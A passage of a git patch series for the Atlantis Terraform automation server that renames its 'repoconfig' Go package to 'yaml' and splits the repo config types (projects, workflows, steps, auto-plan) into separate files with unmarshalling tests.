similarity index 97% rename from server/events/repoconfig/init_step.go rename to server/events/yaml/init_step.go index 022399c4fb..235b90244e 100644 --- a/server/events/repoconfig/init_step.go +++ b/server/events/yaml/init_step.go @@ -1,4 +1,4 @@ -package repoconfig +package yaml // InitStep runs `terraform init`. type InitStep struct { diff --git a/server/events/repoconfig/init_step_test.go b/server/events/yaml/init_step_test.go similarity index 92% rename from server/events/repoconfig/init_step_test.go rename to server/events/yaml/init_step_test.go index 1996e18d18..bfdbd84b5f 100644 --- a/server/events/repoconfig/init_step_test.go +++ b/server/events/yaml/init_step_test.go @@ -1,4 +1,4 @@ -package repoconfig_test +package yaml_test import ( "testing" @@ -6,9 +6,9 @@ import ( "github.com/hashicorp/go-version" . "github.com/petergtz/pegomock" "github.com/runatlantis/atlantis/server/events/mocks/matchers" - "github.com/runatlantis/atlantis/server/events/repoconfig" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" "github.com/runatlantis/atlantis/server/events/terraform/mocks" + "github.com/runatlantis/atlantis/server/events/yaml" "github.com/runatlantis/atlantis/server/logging" . "github.com/runatlantis/atlantis/testing" ) @@ -43,8 +43,8 @@ func TestRun_UsesGetOrInitForRightVersion(t *testing.T) { tfVersion, _ := version.NewVersion(c.version) logger := logging.NewNoopLogger() - s := repoconfig.InitStep{ - Meta: repoconfig.StepMeta{ + s := yaml.InitStep{ + Meta: yaml.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", diff --git a/server/events/repoconfig/plan_step.go b/server/events/yaml/plan_step.go similarity index 99% rename from server/events/repoconfig/plan_step.go rename to server/events/yaml/plan_step.go index 6e7df0db0b..99890e62ea 100644 --- a/server/events/repoconfig/plan_step.go +++ b/server/events/yaml/plan_step.go @@ -1,4 +1,4 @@ -package repoconfig +package yaml import ( "fmt" diff --git a/server/events/repoconfig/plan_step_test.go b/server/events/yaml/plan_step_test.go similarity index 95% rename from server/events/repoconfig/plan_step_test.go rename to server/events/yaml/plan_step_test.go index 7e9e8b1f22..91e9372d37 100644 --- a/server/events/repoconfig/plan_step_test.go +++ b/server/events/yaml/plan_step_test.go @@ -1,4 +1,4 @@ -package repoconfig_test +package yaml_test import ( "errors" @@ -10,9 +10,9 @@ import ( "github.com/hashicorp/go-version" . "github.com/petergtz/pegomock" "github.com/runatlantis/atlantis/server/events/mocks/matchers" - "github.com/runatlantis/atlantis/server/events/repoconfig" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" "github.com/runatlantis/atlantis/server/events/terraform/mocks" + "github.com/runatlantis/atlantis/server/events/yaml" "github.com/runatlantis/atlantis/server/logging" . "github.com/runatlantis/atlantis/testing" ) @@ -25,8 +25,8 @@ func TestRun_NoWorkspaceIn08(t *testing.T) { tfVersion, _ := version.NewVersion("0.8") logger := logging.NewNoopLogger() workspace := "default" - s := repoconfig.PlanStep{ - Meta: repoconfig.StepMeta{ + s := yaml.PlanStep{ + Meta: yaml.StepMeta{ Log: logger, Workspace: workspace, AbsolutePath: "/path", @@ -61,8 +61,8 @@ func TestRun_ErrWorkspaceIn08(t *testing.T) { tfVersion, _ := version.NewVersion("0.8") logger := logging.NewNoopLogger() workspace := "notdefault" - s := repoconfig.PlanStep{ - Meta: repoconfig.StepMeta{ + s := yaml.PlanStep{ + Meta: yaml.StepMeta{ Log: logger, Workspace: workspace, AbsolutePath: "/path", @@ -112,8 +112,8 @@ func TestRun_SwitchesWorkspace(t *testing.T) { tfVersion, _ := version.NewVersion(c.tfVersion) logger := logging.NewNoopLogger() - s := repoconfig.PlanStep{ - Meta: repoconfig.StepMeta{ + s := yaml.PlanStep{ + Meta: yaml.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", @@ -170,8 +170,8 @@ func TestRun_CreatesWorkspace(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion(c.tfVersion) logger := logging.NewNoopLogger() - s := repoconfig.PlanStep{ - Meta: repoconfig.StepMeta{ + s := yaml.PlanStep{ + Meta: yaml.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", @@ -212,8 +212,8 @@ func TestRun_NoWorkspaceSwitchIfNotNecessary(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion("0.10.0") logger := logging.NewNoopLogger() - s := repoconfig.PlanStep{ - Meta: repoconfig.StepMeta{ + s := yaml.PlanStep{ + Meta: yaml.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", @@ -258,8 +258,8 @@ func TestRun_AddsEnvVarFile(t *testing.T) { // Using version >= 0.10 here so we don't expect any env commands. tfVersion, _ := version.NewVersion("0.10.0") logger := logging.NewNoopLogger() - s := repoconfig.PlanStep{ - Meta: repoconfig.StepMeta{ + s := yaml.PlanStep{ + Meta: yaml.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: tmpDir, diff --git a/server/events/repoconfig/reader.go b/server/events/yaml/reader.go similarity index 93% rename from server/events/repoconfig/reader.go rename to server/events/yaml/reader.go index 7f2557e42d..1708e40ff9 100644 --- a/server/events/repoconfig/reader.go +++ b/server/events/yaml/reader.go @@ -1,4 +1,4 @@ -package repoconfig +package yaml import ( "fmt" @@ -46,8 +46,8 @@ func (r *Reader) parseAndValidate(configData []byte) (RepoConfig, error) { if err := yaml.UnmarshalStrict(configData, &repoConfig); err != nil { // Unmarshal error messages aren't fit for user output. We need to // massage them. - // todo: fix "field autoplan not found in struct repoconfig.alias" errors - return repoConfig, errors.New(strings.Replace(err.Error(), " into repoconfig.RepoConfig", "", -1)) + // todo: fix "field autoplan not found in struct yaml.alias" errors + return repoConfig, errors.New(strings.Replace(err.Error(), " into yaml.RepoConfig", "", -1)) } // Validate version. diff --git a/server/events/repoconfig/reader_test.go b/server/events/yaml/reader_test.go similarity index 85% rename from server/events/repoconfig/reader_test.go rename to server/events/yaml/reader_test.go index 02fa41b342..430b4d98d5 100644 --- a/server/events/repoconfig/reader_test.go +++ b/server/events/yaml/reader_test.go @@ -1,16 +1,16 @@ -package repoconfig_test +package yaml_test import ( "io/ioutil" "path/filepath" "testing" - "github.com/runatlantis/atlantis/server/events/repoconfig" + "github.com/runatlantis/atlantis/server/events/yaml" . "github.com/runatlantis/atlantis/testing" ) func TestReadConfig_DirDoesNotExist(t *testing.T) { - r := repoconfig.Reader{} + r := yaml.Reader{} conf, err := r.ReadConfig("/not/exist") Ok(t, err) Assert(t, conf == nil, "exp nil ptr") @@ -20,7 +20,7 @@ func TestReadConfig_FileDoesNotExist(t *testing.T) { tmpDir, cleanup := TempDir(t) defer cleanup() - r := repoconfig.Reader{} + r := yaml.Reader{} conf, err := r.ReadConfig(tmpDir) Ok(t, err) Assert(t, conf == nil, "exp nil ptr") @@ -32,7 +32,7 @@ func TestReadConfig_BadPermissions(t *testing.T) { err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), nil, 0000) Ok(t, err) - r := repoconfig.Reader{} + r := yaml.Reader{} _, err = r.ReadConfig(tmpDir) ErrContains(t, "unable to read atlantis.yaml file: ", err) } @@ -64,7 +64,7 @@ func TestReadConfig_UnmarshalErrors(t *testing.T) { t.Run(c.description, func(t *testing.T) { err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) Ok(t, err) - r := repoconfig.Reader{} + r := yaml.Reader{} _, err = r.ReadConfig(tmpDir) ErrEquals(t, c.expErr, err) }) @@ -159,7 +159,7 @@ projects: version: 2 projects: - unknown: value`, - expErr: "yaml: unmarshal errors:\n line 4: field unknown not found in struct repoconfig.alias", + expErr: "yaml: unmarshal errors:\n line 4: field unknown not found in struct yaml.alias", }, // project workflow doesn't exist @@ -303,6 +303,30 @@ workflows: default: plan: - init +`, + expErr: "missing \"steps\" key", + }, + { + description: "no value after plan:", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: +`, + expErr: "missing \"steps\" key", + }, + { + description: "no value after apply:", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: `, expErr: "missing \"steps\" key", }, @@ -316,7 +340,7 @@ workflows: err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) Ok(t, err) - r := repoconfig.Reader{} + r := yaml.Reader{} _, err = r.ReadConfig(tmpDir) ErrEquals(t, "parsing atlantis.yaml: "+c.expErr, err) }) @@ -324,9 +348,9 @@ workflows: } func TestReadConfig_Successes(t *testing.T) { - basicProjects := []repoconfig.Project{ + basicProjects := []yaml.Project{ { - AutoPlan: &repoconfig.AutoPlan{ + AutoPlan: &yaml.AutoPlan{ Enabled: true, WhenModified: []string{"**/*.tf"}, }, @@ -341,7 +365,7 @@ func TestReadConfig_Successes(t *testing.T) { cases := []struct { description string input string - expOutput repoconfig.RepoConfig + expOutput yaml.RepoConfig }{ { description: "uses project defaults", @@ -349,7 +373,7 @@ func TestReadConfig_Successes(t *testing.T) { version: 2 projects: - dir: "."`, - expOutput: repoconfig.RepoConfig{ + expOutput: yaml.RepoConfig{ Version: 2, Projects: basicProjects, }, @@ -363,7 +387,7 @@ projects: auto_plan: when_modified: ["**/*.tf"] `, - expOutput: repoconfig.RepoConfig{ + expOutput: yaml.RepoConfig{ Version: 2, Projects: basicProjects, }, @@ -375,7 +399,7 @@ version: 2 projects: - dir: "." `, - expOutput: repoconfig.RepoConfig{ + expOutput: yaml.RepoConfig{ Version: 2, Projects: basicProjects, }, @@ -388,7 +412,7 @@ projects: - dir: "." workflows: ~ `, - expOutput: repoconfig.RepoConfig{ + expOutput: yaml.RepoConfig{ Version: 2, Projects: basicProjects, }, @@ -402,13 +426,13 @@ projects: workflows: default: ~ `, - expOutput: repoconfig.RepoConfig{ + expOutput: yaml.RepoConfig{ Version: 2, Projects: basicProjects, - Workflows: map[string]repoconfig.Workflow{ + Workflows: map[string]yaml.Workflow{ "default": { - Plan: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ + Plan: &yaml.Stage{ + Steps: []yaml.StepConfig{ { StepType: "init", }, @@ -417,8 +441,8 @@ workflows: }, }, }, - Apply: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ + Apply: &yaml.Stage{ + Steps: []yaml.StepConfig{ { StepType: "apply", }, @@ -439,13 +463,13 @@ workflows: plan: apply: `, - expOutput: repoconfig.RepoConfig{ + expOutput: yaml.RepoConfig{ Version: 2, Projects: basicProjects, - Workflows: map[string]repoconfig.Workflow{ + Workflows: map[string]yaml.Workflow{ "default": { - Plan: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ + Plan: &yaml.Stage{ + Steps: []yaml.StepConfig{ { StepType: "init", }, @@ -454,8 +478,8 @@ workflows: }, }, }, - Apply: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ + Apply: &yaml.Stage{ + Steps: []yaml.StepConfig{ { StepType: "apply", }, @@ -478,15 +502,15 @@ workflows: apply: steps: `, - expOutput: repoconfig.RepoConfig{ + expOutput: yaml.RepoConfig{ Version: 2, Projects: basicProjects, - Workflows: map[string]repoconfig.Workflow{ + Workflows: map[string]yaml.Workflow{ "default": { - Plan: &repoconfig.Stage{ + Plan: &yaml.Stage{ Steps: nil, }, - Apply: &repoconfig.Stage{ + Apply: &yaml.Stage{ Steps: nil, }, }, @@ -510,13 +534,13 @@ workflows: - plan # we don't validate if they make sense - apply `, - expOutput: repoconfig.RepoConfig{ + expOutput: yaml.RepoConfig{ Version: 2, Projects: basicProjects, - Workflows: map[string]repoconfig.Workflow{ + Workflows: map[string]yaml.Workflow{ "default": { - Plan: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ + Plan: &yaml.Stage{ + Steps: []yaml.StepConfig{ { StepType: "init", }, @@ -525,8 +549,8 @@ workflows: }, }, }, - Apply: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ + Apply: &yaml.Stage{ + Steps: []yaml.StepConfig{ { StepType: "plan", }, @@ -562,13 +586,13 @@ workflows: - apply: extra_args: ["a", "b"] `, - expOutput: repoconfig.RepoConfig{ + expOutput: yaml.RepoConfig{ Version: 2, Projects: basicProjects, - Workflows: map[string]repoconfig.Workflow{ + Workflows: map[string]yaml.Workflow{ "default": { - Plan: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ + Plan: &yaml.Stage{ + Steps: []yaml.StepConfig{ { StepType: "init", ExtraArgs: nil, @@ -579,8 +603,8 @@ workflows: }, }, }, - Apply: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ + Apply: &yaml.Stage{ + Steps: []yaml.StepConfig{ { StepType: "plan", ExtraArgs: []string{"a", "b"}, @@ -610,13 +634,13 @@ workflows: steps: - run: echo apply "arg 2" `, - expOutput: repoconfig.RepoConfig{ + expOutput: yaml.RepoConfig{ Version: 2, Projects: basicProjects, - Workflows: map[string]repoconfig.Workflow{ + Workflows: map[string]yaml.Workflow{ "default": { - Plan: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ + Plan: &yaml.Stage{ + Steps: []yaml.StepConfig{ { StepType: "run", ExtraArgs: nil, @@ -624,8 +648,8 @@ workflows: }, }, }, - Apply: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ + Apply: &yaml.Stage{ + Steps: []yaml.StepConfig{ { StepType: "run", ExtraArgs: nil, @@ -647,7 +671,7 @@ workflows: err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) Ok(t, err) - r := repoconfig.Reader{} + r := yaml.Reader{} act, err := r.ReadConfig(tmpDir) Ok(t, err) Equals(t, &c.expOutput, act) diff --git a/server/events/repoconfig/repoconfig.go b/server/events/yaml/repoconfig.go similarity index 99% rename from server/events/repoconfig/repoconfig.go rename to server/events/yaml/repoconfig.go index 6d71d7de0d..7af982436b 100644 --- a/server/events/repoconfig/repoconfig.go +++ b/server/events/yaml/repoconfig.go @@ -1,4 +1,4 @@ -package repoconfig +package yaml import ( "github.com/hashicorp/go-version" diff --git a/server/events/repoconfig/run_step.go b/server/events/yaml/run_step.go similarity index 97% rename from server/events/repoconfig/run_step.go rename to server/events/yaml/run_step.go index 7a157bb6fb..e4794a22ce 100644 --- a/server/events/repoconfig/run_step.go +++ b/server/events/yaml/run_step.go @@ -1,4 +1,4 @@ -package repoconfig +package yaml import ( "fmt" diff --git a/server/events/yaml/run_step_test.go b/server/events/yaml/run_step_test.go new file mode 100644 index 0000000000..d00e3ec788 --- /dev/null +++ b/server/events/yaml/run_step_test.go @@ -0,0 +1,3 @@ +package yaml + +// todo diff --git a/server/server.go b/server/server.go index e53de94a11..9381d74690 100644 --- a/server/server.go +++ b/server/server.go @@ -36,11 +36,11 @@ import ( "github.com/runatlantis/atlantis/server/events/locking" "github.com/runatlantis/atlantis/server/events/locking/boltdb" "github.com/runatlantis/atlantis/server/events/models" - "github.com/runatlantis/atlantis/server/events/repoconfig" "github.com/runatlantis/atlantis/server/events/run" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" "github.com/runatlantis/atlantis/server/events/webhooks" + "github.com/runatlantis/atlantis/server/events/yaml" "github.com/runatlantis/atlantis/server/logging" "github.com/runatlantis/atlantis/server/static" "github.com/urfave/cli" @@ -200,8 +200,8 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { ConfigReader: configReader, Terraform: terraformClient, } - executionPlanner := &repoconfig.ExecutionPlanner{ - ConfigReader: &repoconfig.Reader{}, + executionPlanner := &yaml.ExecutionPlanner{ + ConfigReader: &yaml.Reader{}, DefaultTFVersion: terraformClient.Version(), TerraformExecutor: terraformClient, } From b531705429ed48b698df0ba2182e7a04e017618f Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Fri, 8 Jun 2018 15:55:55 +0100 Subject: [PATCH 14/69] Split out config elements into separate files --- server/events/yaml/auto_plan.go | 10 ++ server/events/yaml/auto_plan_test.go | 47 ++++++ server/events/yaml/config.go | 206 +------------------------ server/events/yaml/config_test.go | 74 +++++++++ server/events/yaml/project.go | 28 ++++ server/events/yaml/project_test.go | 67 ++++++++ server/events/yaml/reader.go | 8 +- server/events/yaml/reader_test.go | 22 +-- server/events/yaml/stage.go | 5 + server/events/yaml/step_config.go | 82 ++++++++++ server/events/yaml/step_config_test.go | 159 +++++++++++++++++++ server/events/yaml/workflow.go | 60 +++++++ server/events/yaml/workflow_test.go | 123 +++++++++++++++ 13 files changed, 671 insertions(+), 220 deletions(-) create mode 100644 server/events/yaml/auto_plan.go create mode 100644 server/events/yaml/auto_plan_test.go create mode 100644 server/events/yaml/config_test.go create mode 100644 server/events/yaml/project.go create mode 100644 server/events/yaml/project_test.go create mode 100644 server/events/yaml/stage.go create mode 100644 server/events/yaml/step_config.go create mode 100644 server/events/yaml/step_config_test.go create mode 100644 server/events/yaml/workflow.go create mode 100644 server/events/yaml/workflow_test.go diff --git a/server/events/yaml/auto_plan.go b/server/events/yaml/auto_plan.go new file mode 100644 index 0000000000..16bcb80f5b --- /dev/null +++ b/server/events/yaml/auto_plan.go @@ -0,0 +1,10 @@ +package yaml + +type AutoPlan struct { + WhenModified []string `yaml:"when_modified"` + Enabled bool `yaml:"enabled"` +} + +// NOTE: AutoPlan does not implement UnmarshalYAML because we are unable to set +// defaults for bool and []string fields and so we just use the normal yaml +// unmarshalling. diff --git a/server/events/yaml/auto_plan_test.go b/server/events/yaml/auto_plan_test.go new file mode 100644 index 0000000000..2dd8a43ef9 --- /dev/null +++ b/server/events/yaml/auto_plan_test.go @@ -0,0 +1,47 @@ +package yaml_test + +import ( + "testing" + + "github.com/runatlantis/atlantis/server/events/yaml" + . "github.com/runatlantis/atlantis/testing" + yamlv2 "gopkg.in/yaml.v2" +) + +func TestAutoPlan_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp yaml.AutoPlan + }{ + { + description: "should use defaults", + input: ` +`, + exp: yaml.AutoPlan{ + Enabled: false, + WhenModified: nil, + }, + }, + { + description: "should use all set fields", + input: ` +enabled: true +when_modified: ["something-else"] +`, + exp: yaml.AutoPlan{ + Enabled: true, + WhenModified: []string{"something-else"}, + }, + }, + } + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var a yaml.AutoPlan + err := yamlv2.Unmarshal([]byte(c.input), &a) + Ok(t, err) + Equals(t, c.exp, a) + }) + } +} diff --git a/server/events/yaml/config.go b/server/events/yaml/config.go index 3fffcf0135..cd8c4f26eb 100644 --- a/server/events/yaml/config.go +++ b/server/events/yaml/config.go @@ -1,211 +1,7 @@ package yaml -import ( - "fmt" - - "github.com/flynn-archive/go-shlex" - "github.com/pkg/errors" -) - -type RepoConfig struct { +type Config struct { Version int `yaml:"version"` Projects []Project `yaml:"projects"` Workflows map[string]Workflow `yaml:"workflows"` } - -type Project struct { - Dir string `yaml:"dir"` - Workspace string `yaml:"workspace"` - Workflow string `yaml:"workflow"` - TerraformVersion string `yaml:"terraform_version"` - AutoPlan *AutoPlan `yaml:"auto_plan,omitempty"` - ApplyRequirements []string `yaml:"apply_requirements"` -} - -func (p *Project) UnmarshalYAML(unmarshal func(interface{}) error) error { - // Use a type alias so unmarshal doesn't get into an infinite loop. - type alias Project - // Set up defaults. - defaults := alias{ - Workspace: defaultWorkspace, - AutoPlan: &AutoPlan{ - Enabled: true, - WhenModified: []string{"**/*.tf"}, - }, - } - if err := unmarshal(&defaults); err != nil { - return err - } - *p = Project(defaults) - return nil -} - -type AutoPlan struct { - WhenModified []string `yaml:"when_modified"` - Enabled bool `yaml:"enabled"` // defaults to true -} - -func (a *AutoPlan) UnmarshalYAML(unmarshal func(interface{}) error) error { - // Use a type alias so unmarshal doesn't get into an infinite loop. - type alias AutoPlan - // Set up defaults. - defaults := alias{ - // If not specified, we assume it's enabled. - Enabled: true, - } - if err := unmarshal(&defaults); err != nil { - return err - } - *a = AutoPlan(defaults) - return nil -} - -type Workflow struct { - Apply *Stage `yaml:"apply"` // defaults to regular apply steps - Plan *Stage `yaml:"plan"` // defaults to regular plan steps -} - -func (p *Workflow) UnmarshalYAML(unmarshal func(interface{}) error) error { - // Check if they forgot to set the "steps" key. - type MissingSteps struct { - Apply []interface{} - Plan []interface{} - } - var missingSteps MissingSteps - if err := unmarshal(&missingSteps); err == nil { - return errors.New("missing \"steps\" key") - } - - // Use a type alias so unmarshal doesn't get into an infinite loop. - type alias Workflow - var tmp alias - if err := unmarshal(&tmp); err != nil { - return err - } - *p = Workflow(tmp) - - // If plan or apply keys aren't specified we use the default workflow. - if p.Apply == nil { - p.Apply = &Stage{ - []StepConfig{ - { - StepType: "apply", - }, - }, - } - } - - if p.Plan == nil { - p.Plan = &Stage{ - []StepConfig{ - { - StepType: "init", - }, - { - StepType: "plan", - }, - }, - } - } - - return nil -} - -type Stage struct { - Steps []StepConfig `yaml:"steps"` // can either be a built in step like 'plan' or a custom step like 'run: echo hi' -} - -type StepConfig struct { - StepType string - ExtraArgs []string - // Run will be set if the StepType is "run". This is for custom commands. - // Ex. if the key is `run: echo hi` then Run will be "echo hi". - Run []string -} - -func (s *StepConfig) UnmarshalYAML(unmarshal func(interface{}) error) error { - // First try to unmarshal as a single string, ex. - // steps: - // - init - // - plan - var singleString string - err := unmarshal(&singleString) - if err == nil { - if singleString != "init" && singleString != "plan" && singleString != "apply" { - return fmt.Errorf("unsupported step type: %q", singleString) - } - s.StepType = singleString - return nil - } - - // Next, try to unmarshal as a built-in command with extra_args set, ex. - // steps: - // - init: - /// extra_args: ["arg1"] - // - // We need to create a struct for each step so go-yaml knows to call into - // our routine based on the key (ex. init, plan, etc). - // We use a map[string]interface{} as the value so we can manually - // validate key names and return better errors. This is instead of: - // Init struct{ - // ExtraArgs []string `yaml:"extra_args"` - // } `yaml:"init"` - - validateBuiltIn := func(stepType string, args map[string]interface{}) error { - s.StepType = stepType - for k, v := range args { - if k != "extra_args" { - return fmt.Errorf("unsupported key %q for step %s – the only supported key is extra_args", k, stepType) - } - - // parse as []string - val, ok := v.([]interface{}) - if !ok { - return fmt.Errorf("expected array of strings as value of extra_args, not %q", v) - } - var finalVals []string - for _, i := range val { - finalVals = append(finalVals, fmt.Sprintf("%s", i)) - } - s.ExtraArgs = finalVals - } - return nil - } - var initStep struct { - Init map[string]interface{} `yaml:"init"` - } - if err = unmarshal(&initStep); err == nil { - return validateBuiltIn("init", initStep.Init) - } - - var planStep struct { - Plan map[string]interface{} `yaml:"plan"` - } - if err = unmarshal(&planStep); err == nil { - return validateBuiltIn("plan", planStep.Plan) - } - - var applyStep struct { - Apply map[string]interface{} `yaml:"apply"` - } - if err = unmarshal(&applyStep); err == nil { - return validateBuiltIn("apply", applyStep.Apply) - } - - // Try to unmarshal as a custom run step, ex. - // steps: - // - run: my command - var runStep struct { - Run string `yaml:"run"` - } - if err = unmarshal(&runStep); err == nil { - s.StepType = "run" - parts, err := shlex.Split(runStep.Run) - if err != nil { - return err - } - s.Run = parts - } - - return err -} diff --git a/server/events/yaml/config_test.go b/server/events/yaml/config_test.go new file mode 100644 index 0000000000..df4bc9c541 --- /dev/null +++ b/server/events/yaml/config_test.go @@ -0,0 +1,74 @@ +package yaml_test + +import ( + "testing" + + "github.com/runatlantis/atlantis/server/events/yaml" + . "github.com/runatlantis/atlantis/testing" + yamlv2 "gopkg.in/yaml.v2" +) + +func TestConfig_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp yaml.Config + }{ + { + description: "should be empty if nothing set", + input: `~`, + exp: yaml.Config{ + Version: 0, + Projects: nil, + Workflows: nil, + }, + }, + { + description: "should use values if set", + input: ` +version: 2 +projects: +- dir: mydir + workspace: myworkspace + workflow: default +workflows: + default: + plan: + steps: [] + apply: + steps: []`, + exp: yaml.Config{ + Version: 2, + Projects: []yaml.Project{ + { + Dir: "mydir", + Workflow: "default", + Workspace: "myworkspace", + AutoPlan: &yaml.AutoPlan{ + WhenModified: []string{"**/*.tf"}, + Enabled: true, + }, + }, + }, + Workflows: map[string]yaml.Workflow{ + "default": { + Apply: &yaml.Stage{ + Steps: []yaml.StepConfig{}, + }, + Plan: &yaml.Stage{ + Steps: []yaml.StepConfig{}, + }, + }, + }, + }, + }, + } + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var conf yaml.Config + err := yamlv2.Unmarshal([]byte(c.input), &conf) + Ok(t, err) + Equals(t, c.exp, conf) + }) + } +} diff --git a/server/events/yaml/project.go b/server/events/yaml/project.go new file mode 100644 index 0000000000..b2c136e59d --- /dev/null +++ b/server/events/yaml/project.go @@ -0,0 +1,28 @@ +package yaml + +type Project struct { + Dir string `yaml:"dir"` + Workspace string `yaml:"workspace"` + Workflow string `yaml:"workflow"` + TerraformVersion string `yaml:"terraform_version"` + AutoPlan *AutoPlan `yaml:"auto_plan,omitempty"` + ApplyRequirements []string `yaml:"apply_requirements"` +} + +func (p *Project) UnmarshalYAML(unmarshal func(interface{}) error) error { + // Use a type alias so unmarshal doesn't get into an infinite loop. + type alias Project + // Set up defaults. + defaults := alias{ + Workspace: defaultWorkspace, + AutoPlan: &AutoPlan{ + Enabled: true, + WhenModified: []string{"**/*.tf"}, + }, + } + if err := unmarshal(&defaults); err != nil { + return err + } + *p = Project(defaults) + return nil +} diff --git a/server/events/yaml/project_test.go b/server/events/yaml/project_test.go new file mode 100644 index 0000000000..c3ab94d1db --- /dev/null +++ b/server/events/yaml/project_test.go @@ -0,0 +1,67 @@ +package yaml_test + +import ( + "testing" + + "github.com/runatlantis/atlantis/server/events/yaml" + . "github.com/runatlantis/atlantis/testing" + yamlv2 "gopkg.in/yaml.v2" +) + +func TestProject_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp yaml.Project + }{ + { + description: "should use defaults", + input: ` +dir: .`, + exp: yaml.Project{ + Dir: ".", + Workspace: "default", + Workflow: "", + TerraformVersion: "", + AutoPlan: &yaml.AutoPlan{ + WhenModified: []string{"**/*.tf"}, + Enabled: true, + }, + ApplyRequirements: nil, + }, + }, + { + description: "should use all set fields", + input: ` +dir: mydir +workspace: workspace +workflow: workflow +terraform_version: v0.11.0 +auto_plan: + when_modified: [] + enabled: false +apply_requirements: +- mergeable`, + exp: yaml.Project{ + Dir: "mydir", + Workspace: "workspace", + Workflow: "workflow", + TerraformVersion: "v0.11.0", + AutoPlan: &yaml.AutoPlan{ + WhenModified: []string{}, + Enabled: false, + }, + ApplyRequirements: []string{"mergeable"}, + }, + }, + } + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var p yaml.Project + err := yamlv2.Unmarshal([]byte(c.input), &p) + Ok(t, err) + Equals(t, c.exp, p) + }) + } +} diff --git a/server/events/yaml/reader.go b/server/events/yaml/reader.go index 1708e40ff9..eaea835393 100644 --- a/server/events/yaml/reader.go +++ b/server/events/yaml/reader.go @@ -19,7 +19,7 @@ type Reader struct{} // ReadConfig returns the parsed and validated config for repoDir. // If there was no config, it returns a nil pointer. -func (r *Reader) ReadConfig(repoDir string) (*RepoConfig, error) { +func (r *Reader) ReadConfig(repoDir string) (*Config, error) { configFile := filepath.Join(repoDir, AtlantisYAMLFilename) configData, err := ioutil.ReadFile(configFile) @@ -41,13 +41,13 @@ func (r *Reader) ReadConfig(repoDir string) (*RepoConfig, error) { return &config, err } -func (r *Reader) parseAndValidate(configData []byte) (RepoConfig, error) { - var repoConfig RepoConfig +func (r *Reader) parseAndValidate(configData []byte) (Config, error) { + var repoConfig Config if err := yaml.UnmarshalStrict(configData, &repoConfig); err != nil { // Unmarshal error messages aren't fit for user output. We need to // massage them. // todo: fix "field autoplan not found in struct yaml.alias" errors - return repoConfig, errors.New(strings.Replace(err.Error(), " into yaml.RepoConfig", "", -1)) + return repoConfig, errors.New(strings.Replace(err.Error(), " into yaml.Config", "", -1)) } // Validate version. diff --git a/server/events/yaml/reader_test.go b/server/events/yaml/reader_test.go index 430b4d98d5..7dc4b25b4c 100644 --- a/server/events/yaml/reader_test.go +++ b/server/events/yaml/reader_test.go @@ -365,7 +365,7 @@ func TestReadConfig_Successes(t *testing.T) { cases := []struct { description string input string - expOutput yaml.RepoConfig + expOutput yaml.Config }{ { description: "uses project defaults", @@ -373,7 +373,7 @@ func TestReadConfig_Successes(t *testing.T) { version: 2 projects: - dir: "."`, - expOutput: yaml.RepoConfig{ + expOutput: yaml.Config{ Version: 2, Projects: basicProjects, }, @@ -387,7 +387,7 @@ projects: auto_plan: when_modified: ["**/*.tf"] `, - expOutput: yaml.RepoConfig{ + expOutput: yaml.Config{ Version: 2, Projects: basicProjects, }, @@ -399,7 +399,7 @@ version: 2 projects: - dir: "." `, - expOutput: yaml.RepoConfig{ + expOutput: yaml.Config{ Version: 2, Projects: basicProjects, }, @@ -412,7 +412,7 @@ projects: - dir: "." workflows: ~ `, - expOutput: yaml.RepoConfig{ + expOutput: yaml.Config{ Version: 2, Projects: basicProjects, }, @@ -426,7 +426,7 @@ projects: workflows: default: ~ `, - expOutput: yaml.RepoConfig{ + expOutput: yaml.Config{ Version: 2, Projects: basicProjects, Workflows: map[string]yaml.Workflow{ @@ -463,7 +463,7 @@ workflows: plan: apply: `, - expOutput: yaml.RepoConfig{ + expOutput: yaml.Config{ Version: 2, Projects: basicProjects, Workflows: map[string]yaml.Workflow{ @@ -502,7 +502,7 @@ workflows: apply: steps: `, - expOutput: yaml.RepoConfig{ + expOutput: yaml.Config{ Version: 2, Projects: basicProjects, Workflows: map[string]yaml.Workflow{ @@ -534,7 +534,7 @@ workflows: - plan # we don't validate if they make sense - apply `, - expOutput: yaml.RepoConfig{ + expOutput: yaml.Config{ Version: 2, Projects: basicProjects, Workflows: map[string]yaml.Workflow{ @@ -586,7 +586,7 @@ workflows: - apply: extra_args: ["a", "b"] `, - expOutput: yaml.RepoConfig{ + expOutput: yaml.Config{ Version: 2, Projects: basicProjects, Workflows: 